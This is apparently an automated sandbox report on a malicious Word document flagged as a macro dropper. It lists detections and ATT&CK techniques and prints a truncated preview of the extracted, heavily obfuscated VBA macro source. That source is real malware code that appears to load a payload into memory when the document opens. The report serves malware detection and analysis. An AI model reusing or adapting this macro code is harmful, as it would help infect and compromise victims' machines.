MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS and OLE_VBA_DOCOPEN heuristics. The ClamAV detection 'Doc.Dropper.ZwMacros-6057750-0' strongly suggests its dropper functionality. The VBA macro code, though heavily obfuscated, is typical of malware that downloads and executes additional payloads. The presence of macros and the dropper nature point to a spearphishing attachment delivery method.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13653 bytes |
SHA-256: e49e838b74c0bb57f5c985dc45e470340646620d0bfce7ad8c3324c4eed368fb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tableSel()
Dim tempTable
Documents("Log.doc").Tables(1).Select
Set tempTable = Selection.Tables(1).Range
tempRange.Tables(2).Select
End Sub
Sub apprise()
Dim blueeyed As Variant
Dim circumstantially As Byte
bimillenial.hack.Value = Day(#12/5/2007#)
allholy = "botanical"
calotte = scandalously
affections = combinative
Set droughter = bimillenial.hack.SelectedItem
moodiness = 10
aingenium = 38058
cration = 302682
VBA.NPer 0, moodiness, 13772, 57321, 8
dodge = droughter.Name
cancellate = 12 + 5816
bureaucratically = Right(dodge, cancellate)
cloaca = lighterage.balding(bureaucratically)
arab = 57
costal = 21958
countenance = 205713
VBA.NPer 0, arab, 39940, 31223, 4
stretch = "moosewood"
#If Win64 Then
Dim streptomycin As Variant
Dim abrasion As LongPtr
Dim transpontine As LongPtr
Dim mf As Integer
#Else
Dim curled As String
Dim transpontine As Long
Dim field As Byte
Dim abrasion As Long
#End If
overfed = 0
landsturm = "inexterminable"
buccaneer = 44 - 81 + 4133
goat = 38
gingerol = 26577
despiciency = 468775
VBA.NPer 0, goat, 33623, 56657, 5
scots = "true"
soupspoon = piece
perdrix = effuse
craved = 74
stillatitious = 9939
cosmography = 232522
VBA.NPer 0, craved, 32960, 43469, 2
illegibly = cloaca
hymenomycetes = "bloke"
abrasion = drudge(illegibly)
donner = "strategic"
bloodied = "shapeley"
#If Win64 Then
Dim compensable As Byte
Dim statutory As LongPtr
Dim fisher As LongPtr
Dim metallurgist As LongPtr
banned = 117 + 26 + 1169
#Else
Dim statutory As Long
commonplace = 45 + 76 + 374
Dim fisher As Long
Dim metallurgist As Long
banned = commonplace + 2657
#End If
Dim clamatores As Integer
Dim disgorge As Variant
statutory = 0
transpontine = abrasion + banned
fisher = 201527
metallurgist = 3500
piguid = africanamerican(fisher, statutory, transpontine, statutory, statutory, statutory, statutory)
menthol = 52
backstairs = 22009
boards = 201135
VBA.NPer 0, menthol, 31273, 19414, 4
End Sub
Function jumps(acroamatics, astra, vincible)
#If Win64 Then
Dim marlinespike As Byte
Dim valiantly As String
Dim allow As LongPtr
Dim calabash As LongPtr
Dim mb As LongPtr
Dim chalcis As Integer
Dim aphakic As LongPtr
Dim sesotho As LongPtr
#Else
Dim calabash As Long
Dim cyclopes As Byte
Dim allow As Long
Dim heir As String
Dim aphakic As Long
Dim rabbitfish As Long
Dim mb As Long
Dim bloodcurdling As Integer
Dim sesotho As Long
Dim ballot As Integer
Dim gastrocybe As String
#End If
flamboyance = Math.Round(178)
flamboyance = bismarck And 63
calabash = acroamatics
sesotho = vincible
bismarck = Fix(226)
aphakic = astra
dropper = 70
peccavi = 11096
byron = 428446
VBA.NPer 0, dropper, 35421, 19218, 6
cleat = "nimblewill"
allow = 76 - 63 + 123 - 137
extravagation ByVal allow, calabash, aphakic, sesotho, mb
college = college
End Function
Function drudge(alarmism)
Dim clarinetist As Variant
Dim pauperism As Long
Dim manumission As Long
Dim mad As Byte
#If Win64 > 0 Then
Dim outflow As Long
Dim commonsense As LongPtr
buoyant = 50 - 42
Dim medallist As LongPtr
Dim prisonlike As String
Dim vasodilator As String
Dim altostratus As LongPtr
Dim inimitable As Byte
#Else
Dim mire As Variant
Dim commonsense As Long
buoyant = 1 + 3
Dim medallist As Long
Dim purulence As String
Dim altostratus As Long
Dim apprehensiveness As Variant
Dim cochlear As String
#End If
cemetery = VarPtr(commonsense)
doorjamb = jumps(cemetery, VarPtr(alarmism) + 8, buoyant)
mansion = 59 - 120 - 80 + 140
medallist = 0
scolytidae = 101 + 27 - 70 - 58
altostratus = 9902
aboriginal = 120 + 3976
sait = 64
aneroid = influx(ByVal mansion, medallist, ByVal scolytidae, altostratus, ByVal aboriginal, ByVal sait)
bismarck
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.